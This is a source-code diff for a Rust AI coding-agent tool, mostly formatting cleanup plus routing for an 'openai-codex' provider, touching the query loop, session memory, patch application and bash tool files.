             } else {
@@ -898,19 +939,20 @@ pub async fn run_query_loop(
                 // Use the shared model registry from QueryConfig if available;
                 // otherwise construct a temporary one.
                 let temp_reg;
-                let model_reg: &claurst_api::ModelRegistry = if let Some(ref shared) = config.model_registry {
-                    shared
-                } else {
-                    temp_reg = {
-                        let mut r = claurst_api::ModelRegistry::new();
-                        if let Some(cache_dir) = dirs::cache_dir() {
-                            let cache_path = cache_dir.join("claurst").join("models_dev.json");
-                            r.load_cache(&cache_path);
-                        }
-                        r
+                let model_reg: &claurst_api::ModelRegistry =
+                    if let Some(ref shared) = config.model_registry {
+                        shared
+                    } else {
+                        temp_reg = {
+                            let mut r = claurst_api::ModelRegistry::new();
+                            if let Some(cache_dir) = dirs::cache_dir() {
+                                let cache_path = cache_dir.join("claurst").join("models_dev.json");
+                                r.load_cache(&cache_path);
+                            }
+                            r
+                        };
+                        &temp_reg
                     };
-                    &temp_reg
-                };
                 if let Some(detected_pid) = model_reg.find_provider_for_model(&effective_model) {
                     let pid_str = detected_pid.to_string();
                     if pid_str != "anthropic" {
@@ -928,8 +970,11 @@ pub async fn run_query_loop(
             // Dispatch through the provider path for non-Anthropic providers,
             // AND for Anthropic when the pre-built client has no API key
             // (user started without ANTHROPIC_API_KEY but added one via /connect).
-            let use_provider_dispatch = provider_id_str != "anthropic"
-                || client.api_key_is_empty();
+            let use_provider_dispatch = if provider_id_str == "openai-codex" {
+                false
+            } else {
+                provider_id_str != "anthropic" || client.api_key_is_empty()
+            };
 
             if use_provider_dispatch {
                 let pid = claurst_core::provider_id::ProviderId::new(&provider_id_str);
@@ -953,7 +998,9 @@ pub async fn run_query_loop(
                 // llama.cpp), rebuild the provider with the override URL.  These providers
                 // are always pre-registered with a hardcoded default URL, so without this
                 // the --api-base flag would be silently ignored.
-                if let Some(override_base) = tool_ctx.config.provider_configs
+                if let Some(override_base) = tool_ctx
+                    .config
+                    .provider_configs
                     .get(&provider_id_str)
                     .and_then(|pc| pc.api_base.as_deref())
                 {
@@ -983,7 +1030,11 @@ pub async fn run_query_loop(
 
                     // Notify TUI that we're calling the provider
                     if let Some(ref tx) = event_tx {
-                        let _ = tx.send(QueryEvent::Status(format!("Calling {} ({})…", provider.name(), model_id_str)));
+                        let _ = tx.send(QueryEvent::Status(format!(
+                            "Calling {} ({})…",
+                            provider.name(),
+                            model_id_str
+                        )));
                     }
 
                     // Build ProviderRequest from the already-assembled request data.
@@ -992,35 +1043,44 @@ pub async fn run_query_loop(
                     // with placeholder text when the provider doesn't support them,
                     // preventing crashes on text-only models.
                     let mut caps = provider.capabilities();
-                    if let Some(model_entry) = config
-                        .model_registry
-                        .as_ref()
-                        .and_then(|model_registry| model_registry.get(&provider_id_str, &model_id_str))
+                    if let Some(model_entry) =
+                        config.model_registry.as_ref().and_then(|model_registry| {
+                            model_registry.get(&provider_id_str, &model_id_str)
+                        })
                     {
                         caps.image_input = model_entry.vision;
                         caps.tool_calling = model_entry.tool_calling;
                         caps.thinking = model_entry.reasoning;
                     }
-                    let provider_tools: Vec<claurst_core::types::ToolDefinition> = if caps.tool_calling {
-                        tools.iter().map(|t| t.to_definition()).collect()
-                    } else {
-                        Vec::new()
-                    };
+                    let provider_tools: Vec<claurst_core::types::ToolDefinition> =
+                        if caps.tool_calling {
+                            tools.iter().map(|t| t.to_definition()).collect()
+                        } else {
+                            Vec::new()
+                        };
                     let provider_messages: Vec<claurst_core::types::Message> = messages
                         .iter()
                         .map(|msg| {
                             let mut msg = msg.clone();
-                            if let claurst_core::types::MessageContent::Blocks(ref mut blocks) = msg.content {
+                            if let claurst_core::types::MessageContent::Blocks(ref mut blocks) =
+                                msg.content
+                            {
                                 for block in blocks.iter_mut() {
                                     match block {
-                                        claurst_core::types::ContentBlock::Image { .. } if !caps.image_input => {
+                                        claurst_core::types::ContentBlock::Image { .. }
+                                            if !caps.image_input =>
+                                        {
                                             *block = claurst_core::types::ContentBlock::Text {
-                                                text: "[Image not supported by this model]".to_string(),
+                                                text: "[Image not supported by this model]"
+                                                    .to_string(),
                                             };
                                         }
-                                        claurst_core::types::ContentBlock::Document { .. } if !caps.pdf_input => {
+                                        claurst_core::types::ContentBlock::Document { .. }
+                                            if !caps.pdf_input =>
+                                        {
                                             *block = claurst_core::types::ContentBlock::Text {
-                                                text: "[PDF not supported by this model]".to_string(),
+                                                text: "[PDF not supported by this model]"
+                                                    .to_string(),
                                             };
                                         }
                                         _ => {}
@@ -1061,17 +1121,19 @@ pub async fn run_query_loop(
                         Ok(s) => s,
                         Err(e) => {
                             error!(provider = %provider_id_str, error = %e, "Provider stream failed");
-                            return QueryOutcome::Error(
-                                claurst_core::error::ClaudeError::Api(e.to_string())
-                            );
+                            return QueryOutcome::Error(claurst_core::error::ClaudeError::Api(
+                                e.to_string(),
+                            ));
                         }
                     };
 
                     // Accumulators for building the final assistant message.
                     let mut text_chunks: Vec<String> = Vec::new();
                     // tool_call_blocks: index → (id, name, accumulated_json)
-                    let mut tool_call_blocks: std::collections::HashMap<usize, (String, String, String)> =
-                        std::collections::HashMap::new();
+                    let mut tool_call_blocks: std::collections::HashMap<
+                        usize,
+                        (String, String, String),
+                    > = std::collections::HashMap::new();
                     let mut usage = UsageInfo::default();
                     let mut stop_str = "end_turn".to_string();
                     let mut msg_id = uuid::Uuid::new_v4().to_string();
@@ -1166,7 +1228,9 @@ pub async fn run_query_loop(
 
                     let combined_text = text_chunks.join("");
                     if !combined_text.is_empty() {
-                        content_blocks.push(ContentBlock::Text { text: combined_text });
+                        content_blocks.push(ContentBlock::Text {
+                            text: combined_text,
+                        });
                     }
 
                     // Reconstruct tool-use blocks (sorted by index for determinism).
@@ -1174,15 +1238,17 @@ pub async fn run_query_loop(
                     tc_indices.sort();
                     for idx in tc_indices {
                         if let Some((id, name, json_str)) = tool_call_blocks.remove(&idx) {
-                            let input: serde_json::Value = serde_json::from_str(&json_str)
-                                .unwrap_or(serde_json::json!({}));
+                            let input: serde_json::Value =
+                                serde_json::from_str(&json_str).unwrap_or(serde_json::json!({}));
                             content_blocks.push(ContentBlock::ToolUse { id, name, input });
                         }
                     }
 
                     let assistant_msg = Message {
                         role: claurst_core::types::Role::Assistant,
-                        content: claurst_core::types::MessageContent::Blocks(content_blocks.clone()),
+                        content: claurst_core::types::MessageContent::Blocks(
+                            content_blocks.clone(),
+                        ),
                         uuid: Some(msg_id),
                         cost: None,
                     };
@@ -1197,13 +1263,16 @@ pub async fn run_query_loop(
                     messages.push(assistant_msg.clone());
 
                     // Handle tool-use turn: execute tools and loop.
-                    let tool_use_blocks: Vec<_> = content_blocks.iter().filter_map(|b| {
-                        if let ContentBlock::ToolUse { id, name, input } = b {
-                            Some((id.clone(), name.clone(), input.clone()))
-                        } else {
-                            None
-                        }
-                    }).collect();
+                    let tool_use_blocks: Vec<_> = content_blocks
+                        .iter()
+                        .filter_map(|b| {
+                            if let ContentBlock::ToolUse { id, name, input } = b {
+                                Some((id.clone(), name.clone(), input.clone()))
+                            } else {
+                                None
+                            }
+                        })
+                        .collect();
 
                     // Execute tools if any tool_use blocks were returned.
                     // Note: we check the blocks themselves rather than relying
@@ -1221,7 +1290,8 @@ pub async fn run_query_loop(
                                     input_json: tool_input.to_string(),
                                 });
                             }
-                            let result = execute_tool(&*tool_name, &tool_input, tools, &tool_ctx).await;
+                            let result =
+                                execute_tool(&*tool_name, &tool_input, tools, &tool_ctx).await;
                             if let Some(ref tx) = event_tx {
                                 let _ = tx.send(QueryEvent::ToolEnd {
                                     tool_name: tool_name.clone(),
@@ -1232,7 +1302,9 @@ pub async fn run_query_loop(
                             }
                             tool_results.push(ContentBlock::ToolResult {
                                 tool_use_id: tool_id,
-                                content: claurst_core::types::ToolResultContent::Text(result.content),
+                                content: claurst_core::types::ToolResultContent::Text(
+                                    result.content,
+                                ),
                                 is_error: Some(result.is_error),
                             });
                         }
@@ -1278,12 +1350,10 @@ pub async fn run_query_loop(
                         model = %model_id_str,
                         "No credentials found for provider"
                     );
-                    return QueryOutcome::Error(
-                        ClaudeError::Api(format!(
-                            "No API key for provider '{}' (model '{}'). {}",
-                            provider_id_str, model_id_str, hint
-                        ))
-                    );
+                    return QueryOutcome::Error(ClaudeError::Api(format!(
+                        "No API key for provider '{}' (model '{}'). {}",
+                        provider_id_str, model_id_str, hint
+                    )));
                 }
                 // Anthropic with no auth_store key: fall through to the raw
                 // client path below (which has its own deferred key validation
@@ -1299,7 +1369,9 @@ pub async fn run_query_loop(
                 // On overloaded/rate-limit errors, attempt one switch to the fallback model.
                 let err_str = e.to_string().to_lowercase();
                 if !used_fallback
-                    && (err_str.contains("overloaded") || err_str.contains("529") || err_str.contains("rate_limit"))
+                    && (err_str.contains("overloaded")
+                        || err_str.contains("529")
+                        || err_str.contains("rate_limit"))
                 {
                     if let Some(ref fb) = config.fallback_model {
                         warn!(
@@ -1479,13 +1551,7 @@ pub async fn run_query_loop(
                         "Compacting context... (emergency collapse)".to_string(),
                     ));
                 }
-                match compact::context_collapse(
-                    std::mem::take(messages),
-                    client,
-                    config,
-                )
-                .await
-                {
+                match compact::context_collapse(std::mem::take(messages), client, config).await {
                     Ok(result) => {
                         *messages = result.messages;
                         info!(
@@ -1795,22 +1861,26 @@ pub async fn run_query_loop(
                         let plugin_pre_outcome =
                             claurst_plugins::run_global_pre_tool_hook(&name, &input);
 
-                        let blocked_result =
-                            if let claurst_core::hooks::HookOutcome::Blocked(reason) = pre_outcome {
-                                warn!(tool = %name, reason = %reason, "PreToolUse hook blocked execution");
-                                Some(claurst_tools::ToolResult::error(format!(
-                                    "Blocked by hook: {}",
-                                    reason
-                                )))
-                            } else if let claurst_plugins::HookOutcome::Deny(reason) = plugin_pre_outcome {
-                                warn!(tool = %name, reason = %reason, "Plugin PreToolUse hook blocked execution");
-                                Some(claurst_tools::ToolResult::error(format!(
-                                    "Blocked by plugin hook: {}",
-                                    reason
-                                )))
-                            } else {
-                                None
-                            };
+                        let blocked_result = if let claurst_core::hooks::HookOutcome::Blocked(
+                            reason,
+                        ) = pre_outcome
+                        {
+                            warn!(tool = %name, reason = %reason, "PreToolUse hook blocked execution");
+                            Some(claurst_tools::ToolResult::error(format!(
+                                "Blocked by hook: {}",
+                                reason
+                            )))
+                        } else if let claurst_plugins::HookOutcome::Deny(reason) =
+                            plugin_pre_outcome
+                        {
+                            warn!(tool = %name, reason = %reason, "Plugin PreToolUse hook blocked execution");
+                            Some(claurst_tools::ToolResult::error(format!(
+                                "Blocked by plugin hook: {}",
+                                reason
+                            )))
+                        } else {
+                            None
+                        };
 
                         prepared.push(PreparedTool {
                             id,
@@ -1842,12 +1912,10 @@ pub async fn run_query_loop(
                     .collect();
 
                 // Run all tool futures concurrently; join_all preserves order.
-                let exec_results: Vec<ToolResult> =
-                    futures::future::join_all(exec_futures).await;
+                let exec_results: Vec<ToolResult> = futures::future::join_all(exec_futures).await;
 
                 // Phase 3: post-hooks, event emission, and result block assembly.
-                let mut result_blocks: Vec<ContentBlock> =
-                    Vec::with_capacity(prepared.len());
+                let mut result_blocks: Vec<ContentBlock> = Vec::with_capacity(prepared.len());
                 for (p, result) in prepared.iter().zip(exec_results.into_iter()) {
                     let hooks = &tool_ctx.config.hooks;
                     let post_ctx = claurst_core::hooks::HookContext {
@@ -1908,7 +1976,10 @@ pub async fn run_query_loop(
                 };
             }
             other => {
-                warn!(stop_reason = other, "Unknown stop reason, treating as end_turn");
+                warn!(
+                    stop_reason = other,
+                    "Unknown stop reason, treating as end_turn"
+                );
                 fire_stop_hook!(assistant_msg);
                 let _bg = stop_hooks_with_full_behavior(
                     &assistant_msg,
@@ -2016,40 +2087,48 @@ fn map_to_anthropic_event(
                 usage: usage.clone(),
             })
         }
-        StreamEvent::ContentBlockStart { index, content_block } => {
-            Some(AnthropicStreamEvent::ContentBlockStart {
-                index: *index,
-                content_block: content_block.clone(),
-            })
-        }
-        StreamEvent::TextDelta { index, text } => {
-            Some(AnthropicStreamEvent::ContentBlockDelta {
-                index: *index,
-                delta: ContentDelta::TextDelta { text: text.clone() },
-            })
-        }
+        StreamEvent::ContentBlockStart {
+            index,
+            content_block,
+        } => Some(AnthropicStreamEvent::ContentBlockStart {
+            index: *index,
+            content_block: content_block.clone(),
+        }),
+        StreamEvent::TextDelta { index, text } => Some(AnthropicStreamEvent::ContentBlockDelta {
+            index: *index,
+            delta: ContentDelta::TextDelta { text: text.clone() },
+        }),
         StreamEvent::ThinkingDelta { index, thinking } => {
             Some(AnthropicStreamEvent::ContentBlockDelta {
                 index: *index,
-                delta: ContentDelta::ThinkingDelta { thinking: thinking.clone() },
+                delta: ContentDelta::ThinkingDelta {
+                    thinking: thinking.clone(),
+                },
             })
         }
         StreamEvent::ReasoningDelta { index, reasoning } => {
             Some(AnthropicStreamEvent::ContentBlockDelta {
                 index: *index,
-                delta: ContentDelta::ThinkingDelta { thinking: reasoning.clone() },
+                delta: ContentDelta::ThinkingDelta {
+                    thinking: reasoning.clone(),
+                },
             })
         }
-        StreamEvent::InputJsonDelta { index, partial_json } => {
-            Some(AnthropicStreamEvent::ContentBlockDelta {
-                index: *index,
-                delta: ContentDelta::InputJsonDelta { partial_json: partial_json.clone() },
-            })
-        }
+        StreamEvent::InputJsonDelta {
+            index,
+            partial_json,
+        } => Some(AnthropicStreamEvent::ContentBlockDelta {
+            index: *index,
+            delta: ContentDelta::InputJsonDelta {
+                partial_json: partial_json.clone(),
+            },
+        }),
         StreamEvent::SignatureDelta { index, signature } => {
             Some(AnthropicStreamEvent::ContentBlockDelta {
                 index: *index,
-                delta: ContentDelta::SignatureDelta { signature: signature.clone() },
+                delta: ContentDelta::SignatureDelta {
+                    signature: signature.clone(),
+                },
             })
         }
         StreamEvent::ContentBlockStop { index } => {
@@ -2061,9 +2140,13 @@ fn map_to_anthropic_event(
             let stop_reason_str = stop_reason.as_ref().map(|r| match r {
                 claurst_api::provider_types::StopReason::ToolUse => "tool_use".to_string(),
                 claurst_api::provider_types::StopReason::MaxTokens => "max_tokens".to_string(),
-                claurst_api::provider_types::StopReason::StopSequence => "stop_sequence".to_string(),
+                claurst_api::provider_types::StopReason::StopSequence => {
+                    "stop_sequence".to_string()
+                }
                 claurst_api::provider_types::StopReason::EndTurn => "end_turn".to_string(),
-                claurst_api::provider_types::StopReason::ContentFiltered => "content_filtered".to_string(),
+                claurst_api::provider_types::StopReason::ContentFiltered => {
+                    "content_filtered".to_string()
+                }
                 claurst_api::provider_types::StopReason::Other(s) => s.clone(),
             });
             Some(AnthropicStreamEvent::MessageDelta {
@@ -2072,12 +2155,13 @@ fn map_to_anthropic_event(
             })
         }
         StreamEvent::MessageStop => Some(AnthropicStreamEvent::MessageStop),
-        StreamEvent::Error { error_type, message } => {
-            Some(AnthropicStreamEvent::Error {
-                error_type: error_type.clone(),
-                message: message.clone(),
-            })
-        }
+        StreamEvent::Error {
+            error_type,
+            message,
+        } => Some(AnthropicStreamEvent::Error {
+            error_type: error_type.clone(),
+            message: message.clone(),
+        }),
     }
 }
 

--- a/src-rust/crates/query/src/lib.rs
+++ b/src-rust/crates/query/src/lib.rs
@@ -1363,7 +1363,23 @@ pub async fn run_query_loop(
 
         // Send to API
         debug!(turn, model = %effective_model, "Sending API request");
-        let mut stream_rx = match client.create_message_stream(request, handler).await {
+        let codex_selected = tool_ctx.config.provider.as_deref() == Some("openai-codex")
+            || effective_model.starts_with("openai-codex/");
+        let codex_client;
+        let active_client = if codex_selected {
+            codex_client = match client.with_provider(claurst_api::client::Provider::Codex) {
+                Ok(client) => Some(client),
+                Err(e) => {
+                    error!(error = %e, "Failed to construct Codex client");
+                    return QueryOutcome::Error(ClaudeError::Api(e.to_string()));
+                }
+            };
+            codex_client.as_ref().unwrap()
+        } else {
+            client
+        };
+
+        let mut stream_rx = match active_client.create_message_stream(request, handler).await {
             Ok(rx) => rx,
             Err(e) => {
                 // On overloaded/rate-limit errors, attempt one switch to the fallback model.

--- a/src-rust/crates/query/src/session_memory.rs
+++ b/src-rust/crates/query/src/session_memory.rs
@@ -110,19 +110,18 @@ impl SessionMemoryState {
     pub fn has_new_messages_since_last_extraction(&self, messages: &[Message]) -> bool {
         match &self.last_extracted_message_uuid {
             None => true, // Nothing extracted yet → treat all messages as new
-            Some(uuid) => messages.iter().any(|m| m.uuid.as_deref() == Some(uuid.as_str()))
-                && messages
-                    .last()
-                    .and_then(|m| m.uuid.as_deref())
-                    != Some(uuid.as_str()),
+            Some(uuid) => {
+                messages
+                    .iter()
+                    .any(|m| m.uuid.as_deref() == Some(uuid.as_str()))
+                    && messages.last().and_then(|m| m.uuid.as_deref()) != Some(uuid.as_str())
+            }
         }
     }
 
     /// Advance the cursor to the last message in `messages`.
     pub fn advance_cursor(&mut self, messages: &[Message]) {
-        self.last_extracted_message_uuid = messages
-            .last()
-            .and_then(|m| m.uuid.clone());
+        self.last_extracted_message_uuid = messages.last().and_then(|m| m.uuid.clone());
     }
 }
 
@@ -197,10 +196,8 @@ impl SessionMemoryExtractor {
         }
 
         // Require minimum tool calls between updates (mirrors TS toolCallsBetweenUpdates)
-        let tool_calls_since = Self::count_tool_calls_since(
-            messages,
-            state.last_extracted_message_uuid.as_deref(),
-        );
+        let tool_calls_since =
+            Self::count_tool_calls_since(messages, state.last_extracted_message_uuid.as_deref());
 
         tool_calls_since >= MIN_TOOL_CALLS_BETWEEN_EXTRACTIONS
             || !state.has_new_messages_since_last_extraction(messages)
@@ -274,20 +271,14 @@ impl SessionMemoryExtractor {
         }
 
         let memories = parse_extraction_response(&response_text);
-        info!(
-            count = memories.len(),
-            "Session memory extraction complete"
-        );
+        info!(count = memories.len(), "Session memory extraction complete");
 
         Ok(memories)
     }
 
     /// Persist extracted memories to `target_path` (creates directories and
     /// the file if they don't exist).  Appends under `## Auto-extracted memories`.
-    pub async fn persist(
-        memories: &[ExtractedMemory],
-        target_path: &Path,
-    ) -> anyhow::Result<()> {
+    pub async fn persist(memories: &[ExtractedMemory], target_path: &Path) -> anyhow::Result<()> {
         if memories.is_empty() {
             return Ok(());
         }
@@ -415,7 +406,11 @@ fn parse_extraction_response(response: &str) -> Vec<ExtractedMemory> {
             continue;
         }
 
-        memories.push(ExtractedMemory { content, category, confidence });
+        memories.push(ExtractedMemory {
+            content,
+            category,
+            confidence,
+        });
     }
 
     memories
@@ -540,16 +535,34 @@ MEMORY: code_pattern | 7 | Uses builder pattern";
 
     #[test]
     fn test_category_from_str_variants() {
-        assert_eq!(MemoryCategory::from_str("user_preference"), MemoryCategory::UserPreference);
-        assert_eq!(MemoryCategory::from_str("project_fact"), MemoryCategory::ProjectFact);
-        assert_eq!(MemoryCategory::from_str("code_pattern"), MemoryCategory::CodePattern);
-        assert_eq!(MemoryCategory::from_str("decision"), MemoryCategory::Decision);
-        assert_eq!(MemoryCategory::from_str("constraint"), MemoryCategory::Constraint);
+        assert_eq!(
+            MemoryCategory::from_str("user_preference"),
+            MemoryCategory::UserPreference
+        );
+        assert_eq!(
+            MemoryCategory::from_str("project_fact"),
+            MemoryCategory::ProjectFact
+        );
+        assert_eq!(
+            MemoryCategory::from_str("code_pattern"),
+            MemoryCategory::CodePattern
+        );
+        assert_eq!(
+            MemoryCategory::from_str("decision"),
+            MemoryCategory::Decision
+        );
+        assert_eq!(
+            MemoryCategory::from_str("constraint"),
+            MemoryCategory::Constraint
+        );
     }
 
     #[test]
     fn test_category_unknown_defaults_to_project_fact() {
-        assert_eq!(MemoryCategory::from_str("totally_unknown"), MemoryCategory::ProjectFact);
+        assert_eq!(
+            MemoryCategory::from_str("totally_unknown"),
+            MemoryCategory::ProjectFact
+        );
     }
 
     // ---- persist (integration-ish with tempfile) -----------------------
@@ -559,15 +572,15 @@ MEMORY: code_pattern | 7 | Uses builder pattern";
         let dir = tempfile::tempdir().unwrap();
         let target = dir.path().join(".claurst").join("AGENTS.md");
 
-        let memories = vec![
-            ExtractedMemory {
-                content: "Uses async Rust".to_string(),
-                category: MemoryCategory::ProjectFact,
-                confidence: 0.9,
-            },
-        ];
+        let memories = vec![ExtractedMemory {
+            content: "Uses async Rust".to_string(),
+            category: MemoryCategory::ProjectFact,
+            confidence: 0.9,
+        }];
 
-        SessionMemoryExtractor::persist(&memories, &target).await.unwrap();
+        SessionMemoryExtractor::persist(&memories, &target)
+            .await
+            .unwrap();
 
         let content = fs::read_to_string(&target).await.unwrap();
         assert!(content.contains("Auto-extracted memories"));
@@ -581,17 +594,19 @@ MEMORY: code_pattern | 7 | Uses builder pattern";
         let target = dir.path().join("AGENTS.md");
 
         // Write initial content
-        fs::write(&target, "# My Project\n\nExisting content.\n").await.unwrap();
+        fs::write(&target, "# My Project\n\nExisting content.\n")
+            .await
+            .unwrap();
 
-        let memories = vec![
-            ExtractedMemory {
-                content: "Prefers explicit error handling".to_string(),
-                category: MemoryCategory::UserPreference,
-                confidence: 0.8,
-            },
-        ];
+        let memories = vec![ExtractedMemory {
+            content: "Prefers explicit error handling".to_string(),
+            category: MemoryCategory::UserPreference,
+            confidence: 0.8,
+        }];
 
-        SessionMemoryExtractor::persist(&memories, &target).await.unwrap();
+        SessionMemoryExtractor::persist(&memories, &target)
+            .await
+            .unwrap();
 
         let content = fs::read_to_string(&target).await.unwrap();
         assert!(content.contains("Existing content."));
@@ -608,15 +623,15 @@ MEMORY: code_pattern | 7 | Uses builder pattern";
         let initial = "# Notes\n\n## Auto-extracted memories\n\n### Old memories\n- old fact\n";
         fs::write(&target, initial).await.unwrap();
 
-        let memories = vec![
-            ExtractedMemory {
-                content: "New fact discovered".to_string(),
-                category: MemoryCategory::ProjectFact,
-                confidence: 0.7,
-            },
-        ];
+        let memories = vec![ExtractedMemory {
+            content: "New fact discovered".to_string(),
+            category: MemoryCategory::ProjectFact,
+            confidence: 0.7,
+        }];
 
-        SessionMemoryExtractor::persist(&memories, &target).await.unwrap();
+        SessionMemoryExtractor::persist(&memories, &target)
+            .await
+            .unwrap();
 
         let content = fs::read_to_string(&target).await.unwrap();
         // Should have both old and new facts

--- a/src-rust/crates/query/src/skill_prefetch.rs
+++ b/src-rust/crates/query/src/skill_prefetch.rs
@@ -198,7 +198,10 @@ pub fn format_skill_listing(index: &SkillIndex) -> String {
         } else {
             format!(" [{}]", skill.tags.join(", "))
         };
-        out.push_str(&format!("  /{} — {}{}\n", skill.name, skill.description, tags));
+        out.push_str(&format!(
+            "  /{} — {}{}\n",
+            skill.name, skill.description, tags
+        ));
     }
     out
 }

--- a/src-rust/crates/tools/src/apply_patch.rs
+++ b/src-rust/crates/tools/src/apply_patch.rs
@@ -68,11 +68,11 @@ fn parse_unified_diff(patch: &str) -> Result<Vec<FilePatch>, String> {
         } else if line.starts_with("+++ ") {
             // Extract target path, stripping the "b/" prefix if present.
             let raw = &line[4..];
-            let path = raw
-                .trim_start_matches("b/")
-                .trim()
-                .to_string();
-            current_file = Some(FilePatch { path, hunks: Vec::new() });
+            let path = raw.trim_start_matches("b/").trim().to_string();
+            current_file = Some(FilePatch {
+                path,
+                hunks: Vec::new(),
+            });
         } else if line.starts_with("@@ ") {
             // Finalise the previous hunk.
             if let Some(h) = current_hunk.take() {
@@ -166,14 +166,13 @@ fn apply_hunk(lines: Vec<String>, hunk: &Hunk) -> Result<Vec<String>, String> {
     // We start searching from `orig_start` (the hint) but fall back to a
     // full scan if the hint is off (e.g. after earlier hunks shifted lines).
     let search_start = hunk.orig_start.min(lines.len());
-    let pos = find_context_position(&lines, &expected, search_start)
-        .ok_or_else(|| {
-            format!(
-                "Context not found near line {} (looking for {} lines of context/removes)",
-                hunk.orig_start + 1,
-                expected.len()
-            )
-        })?;
+    let pos = find_context_position(&lines, &expected, search_start).ok_or_else(|| {
+        format!(
+            "Context not found near line {} (looking for {} lines of context/removes)",
+            hunk.orig_start + 1,
+            expected.len()
+        )
+    })?;
 
     // Build the replacement: remove '-' and ' ' lines at `pos`, insert '+' and ' '.
     let mut output_prefix = lines[..pos].to_vec();
@@ -205,11 +204,7 @@ fn apply_hunk(lines: Vec<String>, hunk: &Hunk) -> Result<Vec<String>, String> {
 }
 
 /// Search for `expected` lines starting at `hint` and falling back to a full scan.
-fn find_context_position(
-    lines: &[String],
-    expected: &[&str],
-    hint: usize,
-) -> Option<usize> {
+fn find_context_position(lines: &[String], expected: &[&str], hint: usize) -> Option<usize> {
     if expected.is_empty() {
         // A pure-insertion hunk always applies at the hint position.
         return Some(hint.min(lines.len()));
@@ -223,9 +218,7 @@ fn find_context_position(
     };
 
     // Try hint first, then scan forward and backward.
-    let candidates: Vec<usize> = std::iter::once(hint)
-        .chain(0..=max_start)
-        .collect();
+    let candidates: Vec<usize> = std::iter::once(hint).chain(0..=max_start).collect();
 
     for &start in &candidates {
         if start > max_start {
@@ -331,11 +324,7 @@ impl Tool for ApplyPatchTool {
                 match tokio::fs::read_to_string(&path).await {
                     Ok(c) => c,
                     Err(e) => {
-                        return ToolResult::error(format!(
-                            "Cannot read {}: {}",
-                            path.display(),
-                            e
-                        ))
+                        return ToolResult::error(format!("Cannot read {}: {}", path.display(), e))
                     }
                 }
             } else {
@@ -343,10 +332,7 @@ impl Tool for ApplyPatchTool {
             };
 
             // Split into lines (keep newlines for join later).
-            let mut lines: Vec<String> = original_content
-                .lines()
-                .map(|l| l.to_string())
-                .collect();
+            let mut lines: Vec<String> = original_content.lines().map(|l| l.to_string()).collect();
 
             let mut file_added: i64 = 0;
             let mut file_removed: i64 = 0;
@@ -421,11 +407,7 @@ impl Tool for ApplyPatchTool {
 
         for (path, original_bytes, new_content) in &to_write {
             if let Err(e) = tokio::fs::write(path, new_content).await {
-                return ToolResult::error(format!(
-                    "Failed to write {}: {}",
-                    path.display(),
-                    e
-                ));
+                return ToolResult::error(format!("Failed to write {}: {}", path.display(), e));
             }
             ctx.record_file_change(
                 path.clone(),

--- a/src-rust/crates/tools/src/ask_user.rs
+++ b/src-rust/crates/tools/src/ask_user.rs
@@ -73,7 +73,6 @@ impl Tool for AskUserQuestionTool {
             "type": "ask_user",
         });
 
-        ToolResult::success(format!("Question: {}", params.question))
-            .with_metadata(meta)
+        ToolResult::success(format!("Question: {}", params.question)).with_metadata(meta)
     }
 }

--- a/src-rust/crates/tools/src/bash.rs
+++ b/src-rust/crates/tools/src/bash.rs
@@ -1,10 +1,10 @@
 // Bash tool: execute shell commands with timeout, streaming output, and
 // persistent shell state (cwd + env) across invocations.
 
-use crate::{PermissionLevel, ShellState, Tool, ToolContext, ToolResult, session_shell_state};
+use crate::{session_shell_state, PermissionLevel, ShellState, Tool, ToolContext, ToolResult};
 use async_trait::async_trait;
-use claurst_core::bash_classifier::{BashRiskLevel, classify_bash_command};
-use claurst_core::tasks::{BackgroundTask, global_registry};
+use claurst_core::bash_classifier::{classify_bash_command, BashRiskLevel};
+use claurst_core::tasks::{global_registry, BackgroundTask};
 use regex::Regex;
 use serde::Deserialize;
 use serde_json::{json, Value};
@@ -61,8 +61,17 @@ fn parse_shell_state_block(lines: &[String]) -> Option<(PathBuf, HashMap<String,
             let key = line[..eq].to_string();
             let val = line[eq + 1..].to_string();
             // Filter out internal bash / system variables we don't want to persist
-            if !key.starts_with('_') && !["SHLVL", "BASH_LINENO", "BASH_SOURCE",
-                "FUNCNAME", "PIPESTATUS", "OLDPWD"].contains(&key.as_str()) {
+            if !key.starts_with('_')
+                && ![
+                    "SHLVL",
+                    "BASH_LINENO",
+                    "BASH_SOURCE",
+                    "FUNCNAME",
+                    "PIPESTATUS",
+                    "OLDPWD",
+                ]
+                .contains(&key.as_str())
+            {
                 env_vars.insert(key, val);
             }
         }
@@ -76,8 +85,9 @@ fn parse_shell_state_block(lines: &[String]) -> Option<(PathBuf, HashMap<String,
 /// constructs are handled by the full env-dump approach instead.
 fn extract_exports_from_command(command: &str) -> HashMap<String, String> {
     // Match: export VAR=value  or  export VAR="value"  or  export VAR='value'
-    let re = Regex::new(r#"(?m)^\s*export\s+([A-Za-z_][A-Za-z0-9_]*)=(?:"([^"]*)"|'([^']*)'|(\S*))"#)
-        .unwrap();
+    let re =
+        Regex::new(r#"(?m)^\s*export\s+([A-Za-z_][A-Za-z0-9_]*)=(?:"([^"]*)"|'([^']*)'|(\S*))"#)
+            .unwrap();
     let mut map = HashMap::new();
     for cap in re.captures_iter(command) {
         let key = cap[1].to_string();
@@ -99,18 +109,11 @@ fn extract_exports_from_command(command: &str) -> HashMap<String, String> {
 /// 3. Prints the sentinel + final pwd + `env` dump so we can persist state.
 ///
 /// On Windows we skip the wrapping (cmd.exe is a different shell).
-fn build_wrapper_script(
-    command: &str,
-    state: &ShellState,
-    base_cwd: &PathBuf,
-) -> String {
-    let effective_cwd = state
-        .cwd
-        .as_ref()
-        .unwrap_or(base_cwd);
+fn build_wrapper_script(command: &str, state: &ShellState, base_cwd: &PathBuf) -> String {
+    let effective_cwd = state.cwd.as_ref().unwrap_or(base_cwd);
 
     // Escape the cwd for single-quote embedding
-    let cwd_escaped: String = effective_cwd.to_string_lossy().replace('\'', "'\\''" );
+    let cwd_escaped: String = effective_cwd.to_string_lossy().replace('\'', "'\\''");
 
     // Build export lines for persisted env vars
     let mut export_lines = String::new();
@@ -154,89 +157,90 @@ async fn run_in_background(command: String, cwd: PathBuf, timeout_ms: u64) -> To
     let command_clone = command.clone();
 
     tokio::spawn(async move {
-        let result = tokio::time::timeout(
-            Duration::from_millis(timeout_ms),
-            async {
-                let child = if cfg!(windows) {
-                    Command::new("cmd")
-                        .arg("/C")
-                        .arg(&command_clone)
-                        .current_dir(&cwd)
-                        .stdout(Stdio::piped())
-                        .stderr(Stdio::piped())
-                        .stdin(Stdio::null())
-                        .spawn()
-                } else {
-                    Command::new("bash")
-                        .arg("-c")
-                        .arg(&command_clone)
-                        .current_dir(&cwd)
-                        .stdout(Stdio::piped())
